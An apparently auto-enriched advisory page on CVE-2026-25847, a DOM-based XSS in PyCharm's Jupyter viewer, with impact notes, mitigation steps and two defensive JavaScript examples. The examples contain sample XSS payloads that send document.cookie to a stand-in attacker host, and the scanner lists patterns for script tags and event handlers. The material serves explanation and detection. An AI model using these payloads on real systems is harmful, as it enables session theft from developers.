
CVE-2026-25847: CWE-79 in JetBrains PyCharm

Severity: High
Tags: Vulnerability, CVE-2026-25847, cve, cve-2026-25847, cwe-79
Published: Mon Feb 09 2026 (02/09/2026, 10:39:00 UTC)
Source: CVE Database V5
Vendor/Project: JetBrains
Product: PyCharm

Description

In JetBrains PyCharm before 2025.3.2, a DOM-based XSS on the Jupyter viewer page was possible.

AI-Powered Analysis

Last updated: 02/09/2026, 11:15:59 UTC

Technical Analysis

CVE-2026-25847 is a DOM-based cross-site scripting (XSS, CWE-79) vulnerability in JetBrains PyCharm, a widely used Python IDE. It affects the Jupyter viewer page in PyCharm versions before 2025.3.2; 2025.3.2 is the release that fixes it.

DOM-based XSS arises when client-side script takes untrusted data from a source it controls (a URL fragment or parameter, file content, a message from another component) and writes it into an HTML-interpreting sink such as innerHTML or insertAdjacentHTML without escaping or sanitization, so attacker-controlled markup becomes live script. The payload never needs to pass through a server: the vulnerable write happens entirely in the client. In PyCharm the Jupyter viewer is rendered by an embedded browser component inside the IDE, so injected script runs in that component's context rather than in an ordinary browser tab. The public description does not say which input reaches the sink; the obvious candidate is content carried in a notebook file (cell outputs or Markdown), but that is an inference, not a confirmed detail. What the script can do depends on what the embedded view exposes: content shown in the viewer, actions it can perform, and any bridge between the view and the IDE.

The CVSS v3.1 base score of 8.2 (High) corresponds to the metrics given in the record: network attack vector, high attack complexity, no privileges required, user interaction required, changed scope, high confidentiality and integrity impact, low availability impact (vector string AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L). Changed scope means the impact reaches beyond the vulnerable viewer component itself. User interaction is required, so a victim must open or view attacker-influenced content; no authentication is needed to stage it.

No exploitation in the wild was known at the time of writing. Even so, the vulnerability matters because PyCharm is common in development organizations, particularly where Jupyter notebooks are used for data science and research, and notebooks are routinely exchanged between people and downloaded from public repositories. The record carries no patch links, but the version boundary in the description identifies the fix: update to 2025.3.2 or later.
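To make the DOM-based XSS pattern concrete, the following is an added example, not PyCharm's code: a toy notebook-output renderer that splices an untrusted cell output into markup destined for an HTML sink, beside a hardened version that escapes plain text and confines rich HTML to a sandboxed iframe. The advisory does not say which input or sink was involved in PyCharm; the `plainOutput` and `htmlOutput` objects, the `attacker.example` host and all function names are constructed for this illustration.

```javascript
// Added example (not PyCharm's code): a toy notebook-output renderer showing
// the DOM-based XSS pattern the advisory describes, next to a hardened form.
// The advisory does not say which input or sink was involved in PyCharm; the
// cell outputs below are constructed for this example.

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]);
}

// Constructed attacker-controlled cell output. text/plain is what the kernel
// printed; a viewer that treats it as HTML turns the <img onerror> into script.
const plainOutput = {
  output_type: "display_data",
  metadata: {},
  data: {
    "text/plain": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
  },
};

// Constructed rich output, as a DataFrame would produce, with a script
// smuggled in. text/html must be rendered, but never with the host's powers.
const htmlOutput = {
  output_type: "execute_result",
  execution_count: 1,
  metadata: {},
  data: {
    "text/html": "<table><tr><td>1</td></tr></table><script>alert(document.domain)</script>",
  },
};

// VULNERABLE: untrusted text is spliced into markup that the host then hands
// to an HTML sink (element.innerHTML = renderUnsafe(out)). The payload's tags
// are interpreted, so its event handler runs in the viewer's origin.
function renderUnsafe(out) {
  const text = out.data["text/plain"] ?? "";
  return `<pre class="output">${text}</pre>`;
}

// HARDENED: text/plain is HTML-escaped (the string equivalent of assigning
// element.textContent), and text/html is confined to a sandboxed iframe.
// sandbox="" (no allow-scripts, no allow-same-origin) gives the frame an
// opaque origin and forbids script, so the smuggled <script> is inert and
// cannot reach the host document.
function renderSafe(out) {
  const parts = [];
  if ("text/plain" in out.data) {
    parts.push(`<pre class="output">${escapeHtml(out.data["text/plain"])}</pre>`);
  }
  if ("text/html" in out.data) {
    // srcdoc is an attribute, so the whole document is attribute-escaped.
    parts.push(`<iframe sandbox="" srcdoc="${escapeHtml(out.data["text/html"])}"></iframe>`);
  }
  return parts.join("\n");
}

// Does the rendered markup contain a live (unescaped) tag of the given name?
function hasRawTag(html, tag) {
  return new RegExp(`<${tag}\\b`, "i").test(html);
}

// Demonstration when run directly.
console.log("unsafe has live <img>:  ", hasRawTag(renderUnsafe(plainOutput), "img"));  // true
console.log("safe has live <img>:    ", hasRawTag(renderSafe(plainOutput), "img"));    // false
console.log("safe has live <script>: ", hasRawTag(renderSafe(htmlOutput), "script"));  // false
```

The two functions return strings so the example runs outside a browser; in a real viewer the same split is `element.textContent = text` for plain output and a sandboxed frame (or a vetted HTML sanitizer) for rich output, with `innerHTML` never receiving raw notebook content.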

Potential Impact

For European organizations, the main exposure is in software development, data science and research teams, where PyCharm and Jupyter notebooks are heavily used. Exploitation could disclose source code, credentials or other intellectual property visible to the viewer, undermining confidentiality, and could compromise the integrity of the development environment: an attacker able to alter project files or notebook content from inside the IDE sits upstream of the build, which turns a workstation compromise into a potential software supply-chain risk.

Availability impact is low, but the trustworthiness of development tooling is critical; a compromised IDE disrupts workflows and damages confidence in the software it produces. Organizations in finance, healthcare and critical infrastructure, which depend on secure development practices, face heightened exposure.

The vector requires user interaction, so delivery would realistically rely on phishing or social engineering, for example a notebook the victim is persuaded to open in PyCharm. Because the attack vector is network-based, an attacker does not need access to the internal network to reach a developer, only a way to get the content in front of them.

Mitigation Recommendations

1. Update PyCharm to 2025.3.2 or later; this is the fixed version named in the advisory. Verify the installed version in the About dialog across developer machines, including installs managed through JetBrains Toolbox, rather than assuming auto-update has run.
2. Until updated, do not open notebooks from untrusted sources in PyCharm's Jupyter viewer. Treat .ipynb files received by email, downloaded from public repositories or submitted in pull requests as untrusted input.
3. A strict Content Security Policy is a defence the viewer page itself must carry; it cannot be applied from outside the IDE. Treat it as something to expect from the vendor fix, not as an organizational control.
4. Brief developers that opening an unverified notebook is enough to trigger this class of bug, since the required user interaction is simply viewing content in the IDE.
5. Monitor egress from developer workstations for unexpected connections originating from the IDE process after notebooks are opened; XSS payloads commonly exfiltrate over HTTP(S) to attacker-controlled hosts.
6. Use endpoint protection that covers developer workstations and can alert on the IDE spawning unexpected child processes or making unusual network connections, rather than treating development machines as out of scope.
7. For notebooks produced or shared internally, review rendered outputs before committing them, or strip outputs from notebooks in version control (tools such as nbstripout do this), so that rich HTML outputs are not carried through repositories to other developers' viewers.
8. Record the vulnerability in vulnerability management and incident response plans, including the list of hosts running affected PyCharm versions, so that remediation can be tracked to completion.
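The recommendation to treat externally sourced notebooks as untrusted input is easier to follow with a quick triage pass before opening a file. The following is an added example, not PyCharm's code or a JetBrains tool: a heuristic scanner that walks the places a viewer renders as HTML (Markdown cell sources and text/html or SVG outputs) and flags markers of active content. It is a triage aid, not a sanitizer; the `sampleNotebook` object, the `attacker.example` host and all names are constructed for this example.

```javascript
// Added example (not PyCharm's code): a pre-open triage scan for .ipynb
// files, supporting the recommendation to treat notebooks from untrusted
// sources as untrusted input. It is a heuristic for spotting rendered-HTML
// content that has no place in a data-science notebook, not a sanitizer.
// The notebook below is constructed for this example.

// Markers of active content in HTML that a viewer might render.
const SUSPICIOUS = [
  { name: "script tag", re: /<script\b/i },
  { name: "inline event handler", re: /\bon[a-z]+\s*=/i },
  { name: "javascript: URL", re: /javascript\s*:/i },
  { name: "nested frame", re: /<(iframe|object|embed)\b/i },
];

// nbformat allows a string or a list of lines for sources and payloads.
function textOf(v) {
  return Array.isArray(v) ? v.join("") : String(v ?? "");
}

// Collect every place the viewer would render as HTML: Markdown cell sources
// (Markdown admits raw HTML) and text/html or SVG outputs of code cells.
// text/plain is deliberately not scanned: a correct viewer escapes it, and
// printed HTML strings would flood the results with false positives.
function renderedHtmlSpots(cell) {
  const spots = [];
  if (cell.cell_type === "markdown") {
    spots.push(["markdown source", textOf(cell.source)]);
  }
  for (const out of cell.outputs ?? []) {
    for (const [mime, payload] of Object.entries(out.data ?? {})) {
      if (mime === "text/html" || mime === "image/svg+xml") {
        spots.push([`output ${mime}`, textOf(payload)]);
      }
    }
  }
  return spots;
}

// Returns findings as { cell, where, pattern }. An empty list means nothing
// matched the heuristics, not that the notebook is safe.
function scanNotebook(nb) {
  const findings = [];
  (nb.cells ?? []).forEach((cell, idx) => {
    for (const [where, text] of renderedHtmlSpots(cell)) {
      for (const { name, re } of SUSPICIOUS) {
        if (re.test(text)) findings.push({ cell: idx, where, pattern: name });
      }
    }
  });
  return findings;
}

// Constructed notebook: a benign heading, a benign DataFrame table, and one
// output carrying an SVG onload handler that would fire when rendered as HTML.
const sampleNotebook = {
  nbformat: 4,
  nbformat_minor: 5,
  metadata: {},
  cells: [
    { cell_type: "markdown", metadata: {}, source: ["# Results\n", "Plain heading."] },
    {
      cell_type: "code", metadata: {}, execution_count: 1, source: "df.head()",
      outputs: [{
        output_type: "execute_result", execution_count: 1, metadata: {},
        data: { "text/plain": "   a\n0  1", "text/html": "<table><tr><td>1</td></tr></table>" },
      }],
    },
    {
      cell_type: "code", metadata: {}, execution_count: 2, source: "display(HTML(payload))",
      outputs: [{
        output_type: "display_data", metadata: {},
        data: { "text/html": "<svg onload=\"fetch('https://attacker.example/?c='+document.cookie)\"></svg>" },
      }],
    },
  ],
};

// Demonstration when run directly. Against a real file, replace sampleNotebook
// with JSON.parse(require("fs").readFileSync(path, "utf8")).
for (const f of scanNotebook(sampleNotebook)) {
  console.log(`cell ${f.cell}: ${f.pattern} in ${f.where}`);
}
```

A hit does not prove malice (legitimate visualisation libraries emit script-bearing HTML), and a clean result does not prove safety; the value is in surfacing notebooks that deserve a look, or a sandboxed viewer, before they reach a vulnerable IDE.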


Technical Details

Data Version: 5.2
Assigner Short Name: JetBrains
Date Reserved: 2026-02-06T14:16:37.003Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 6989be7b4b57a58fa145bd8d

Added to database: 2/9/2026, 11:01:15 AM

Last enriched: 2/9/2026, 11:15:59 AM

Last updated: 2/9/2026, 12:16:00 PM
